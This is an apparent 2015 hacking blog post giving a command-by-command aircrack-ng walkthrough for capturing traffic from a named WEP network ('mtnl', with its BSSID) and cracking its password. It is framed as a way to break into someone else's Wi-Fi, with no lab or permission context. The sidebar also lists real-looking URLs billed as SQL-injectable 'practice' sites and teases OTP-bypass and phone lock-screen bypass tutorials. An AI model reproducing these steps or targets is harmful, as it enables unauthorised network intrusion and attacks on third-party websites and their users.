- Open up a Terminal window.
- Enter: airmon-ng
- Note down the interface on which you want to start the monitoring. In my case it is wlan0 so I will be using wlan0.
- Enter: airmon-ng start wlan0 If the result looks like this: then your card is in monitor mode.
- Note down the monitoring interface’s name (“monitor mode enabled on mon0“). In my case it is mon0 so I will be using mon0.
- Enter: airodump-ng mon0
- My target is “mtnl” which is using WEP encryption and authentication. Wifi “mtnl” is working on channel 4 and BSSID (or bssid) is 0C:D2:B5:03:43:68. I will be using this information. Enter: airodump-ng –w mtnl-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0
- After about 15,000 packets have been captured, enter: aircrack-ng mtnl-org-01.cap to start cracking the WEP password.
Ads
Thursday, 24 September 2015
Subscribe to:
Post Comments (Atom)
Weekly
-
SQL Vulnerable Websites For Practice 2015 http://classic-sprint.net.IN/article.php?id=3 http://fmshirtssale.IN/art...
-
Hello Reader, this tutorial show you How to Bypass OTP verification in ladoo app in Bluestacks/Youwave Steps:- Download Rooted Bl...
-
Procedure : 1. Dial 1 2 9 from Airtel number. 2. You will listen a song then you will be asked to choose language. ...
-
Requirements: 1. Kali Linux / Backtrack 5 (Having MSF) 2. Android Phone ( Jelly Beans - I am Using Samsung S3) 3. Common Wireles...
-
Open up a Terminal window. Enter: airmon-ng Note down the interface on which you want to start the monitoring. In my case it is ...
-
How to Use your Android Device as a Webcam Requirements : Android Device of course PC with WIFI Connectivity Download...
-
How to Earn Rs 50 Flipkart EGV by Refer PROCEDURE : Firstly Download FlipkartPing app HERE . Open This app and ...
-
1 : click on create new virtual machine create new virtual machine 2 : choose ISO choose ISO 3 : Select Guest Operating System selec...
-
Procedure : 1. Firstly, register Yroo account from Here . 2. Now signup using Facebook or Gmail . Note : Do no...
-
A Security researcher and hacker, named John Gordon , has found an easy way to bypass the security of locked smartphones running ...
Comments
Get this Recent Comments Widget
0 Comment to "Wifi Hack: Crack WEP Passwords"
Post a Comment